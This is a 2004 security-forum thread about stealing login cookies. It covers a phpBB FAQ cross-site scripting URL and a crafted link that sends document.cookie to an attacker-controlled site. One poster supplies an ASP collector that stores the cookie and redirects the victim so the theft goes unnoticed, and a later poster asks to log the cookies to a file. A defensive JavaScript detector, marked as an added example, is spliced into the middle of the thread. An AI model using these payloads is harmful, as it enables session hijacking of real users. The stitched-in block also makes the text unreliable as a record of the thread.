IT Security and Insecurity Portal

Question about stealing cookies

Posted: Wed Jul 21, 2004 10:26 am
Alcker | Beginner | Joined: Jul 21, 2004 | Posts: 3

Hi, I was testing the new phpBB FAQ bug, and I used the example in http://www.waraxe.us/forum/viewtopic.php?t=224. I have put it in this form:

Code:
http://target.com/phpBB2/faq.php?faq[0][0]=%3Cscript%3Edocument.location= 'www.web.com/cookie.php?cookie=' + window.document.cookie;%3C/script%3E

but I do not get any result. Does somebody know why that is?
Thx very much!

P.S.: Sorry for my English.

Posted: Wed Jul 21, 2004 2:12 pm
r0ot | Regular user | Joined: Jul 18, 2004 | Posts: 15

www.web.com/cookie.php <-- your site with a special page to gather cookies from a querystring and store it somewhere (db, file, etc)

but there's no use if u click the link cause it will send your cookies to the page... lol not the one u want
 
 Got it?
 
 If not, mail me or pvt..
 
 Best Regards
 
 r0ot

Posted: Wed Jul 21, 2004 3:11 pm
Alcker | Beginner | Joined: Jul 21, 2004 | Posts: 3

Yes, that page is prepared, but it does not work (I don't know the reason).
Can you give me an example for this bug? (If there are any)
 
 Thanks!

Posted: Wed Jul 21, 2004 6:29 pm
r0ot | Regular user | Joined: Jul 18, 2004 | Posts: 15

sup Alck,
This isn't a bug, but an attack type that pretends that a user that dun know bout click on the link after he loggon a site, etc... (like a forum, so u make a post and put a link etc...)
Lemme show an example:
I ain't no good @ php lets try some asp pages hehe
 
 @1-Your Target: www.forum.com
 
 @2-Your page that will get the cookie: www.myweb.com/cookie.asp
 
 
 You make a post on @1 that have a url like this:
 <a href="#" onClick="document.location = 'http://www.myweb.com/cookie.asp?cookieValue=' + window.document.cookie">Click here to check my new website</a>
 
So if the user clicks on the crafted link they will be redirected to your page which will do the following:

1- get cookie and store it on a table
2- redirect the user to the correct link (so it doesn't look suspicious)
 
 cookie.asp
 -------------------------
 <%
 .... (connect to the db, creates a recordset, etc..)
 dim rCookieValue
 rCookieValue = trim(request("cookieValue"))
 
 ... (insert into the db with rCookieValue)
 
 %>
 <script>
 location.href = 'rightpage.asp'
 </script>
 
 ------------------------
 
 Got it?
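
Added example, not part of the thread and not written by any of the posters: a defender-side check that decodes a request URL or a submitted post body and flags the patterns described above (a script tag in a query parameter, an inline event handler, and a `document.cookie` read combined with scripted navigation). The function names, rule ids and sample inputs are constructed for illustration.

```javascript
// Added example (not from the thread). All names are hypothetical and the
// sample inputs are constructed.

// Percent-decode byte-wise for a bounded number of rounds so that
// double-encoded and partly malformed input is still inspected.
function fullyDecode(input, maxRounds = 3) {
  let current = input;
  for (let i = 0; i < maxRounds; i++) {
    const next = current
      .replace(/\+/g, ' ')
      .replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
    if (next === current) break;
    current = next;
  }
  return current;
}

const RULES = [
  { id: 'script-tag', re: /<\s*script\b/i },
  { id: 'inline-event-handler', re: /<[^>]*\son\w+\s*=/i },
  { id: 'cookie-read', re: /document\s*\.\s*cookie/i },
  { id: 'scripted-navigation', re: /(document\s*\.\s*location|location\s*\.\s*href)\s*=/i },
];

// Returns the matched rule ids and a coarse severity for one input string.
function inspect(input) {
  const decoded = fullyDecode(input);
  const hits = RULES.filter(r => r.re.test(decoded)).map(r => r.id);
  // A cookie read plus navigation in the same input is the high-signal pair.
  const paired = hits.includes('cookie-read') && hits.includes('scripted-navigation');
  const severity = paired ? 'high' : hits.length > 0 ? 'medium' : 'none';
  return { severity, hits };
}

// Constructed samples modelled on the two forms quoted in this thread.
const sampleUrl = "/phpBB2/faq.php?faq[0][0]=%3Cscript%3Edocument.location=" +
  "'www.example.test/c?cookie='+window.document.cookie;%3C/script%3E";
const samplePost = '<a href="#" onClick="document.location = ' +
  "'http://www.example.test/c?v=' + window.document.cookie\">Click here</a>";
const benignUrl = '/phpBB2/faq.php?mode=bbcode';

console.log(inspect(sampleUrl), inspect(samplePost), inspect(benignUrl));
```

The same rules can run over web server access logs and over post bodies at submission time; a hit is a reason to review the request, not proof of compromise.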

Posted: Wed Jul 21, 2004 10:12 pm
Alcker | Beginner | Joined: Jul 21, 2004 | Posts: 3

I have already done that; the problem is that it does not work for me :(
Thx!!

Posted: Thu Jul 22, 2004 12:33 pm
r0ot | Regular user | Joined: Jul 18, 2004 | Posts: 15

Np m8, anytime.
If u want help juz pm me

WTF

Posted: Fri Jul 23, 2004 8:57 pm
Cface | Beginner | Joined: Jul 23, 2004 | Posts: 3

Hey I'm pretty stupid so could you break it down to me. I'm new to this.
_________________
I g0t hack3d, now it's payback!

Posted: Thu May 05, 2005 12:35 pm
KarachiKing555 | Beginner | Joined: May 05, 2005 | Posts: 1

r0ot wrote:
> sup Alck,
> This isn't a bug, but an attack type that pretends that a user that dun know bout click on the link after he loggon a site, etc... (like a forum, so u make a post and put a link etc...)
> Lemme show an example:
> I ain't no good @ php lets try some asp pages hehe
>
> @1-Your Target: www.forum.com
>
> @2-Your page that will get the cookie: www.myweb.com/cookie.asp
>
> You make a post on @1 that have a url like this:
> <a href="#" onClick="document.location = 'http://www.myweb.com/cookie.asp?cookieValue=' + window.document.cookie">Click here to check my new website</a>
>
> So if the user clicks on the crafted link they will be redirected to your page which will do the following:
>
> 1- get cookie and store it on a table
> 2- redirect the user to the correct link (so it doesn't look suspicious)
>
> cookie.asp
> -------------------------
> <%
> .... (connect to the db, creates a recordset, etc..)
> dim rCookieValue
> rCookieValue = trim(request("cookieValue"))
>
> ... (insert into the db with rCookieValue)
>
> %>
> <script>
> location.href = 'rightpage.asp'
> </script>
>
> ------------------------
>
> Got it?

What if I want the cookies in a txt file on my server??

All times are GMT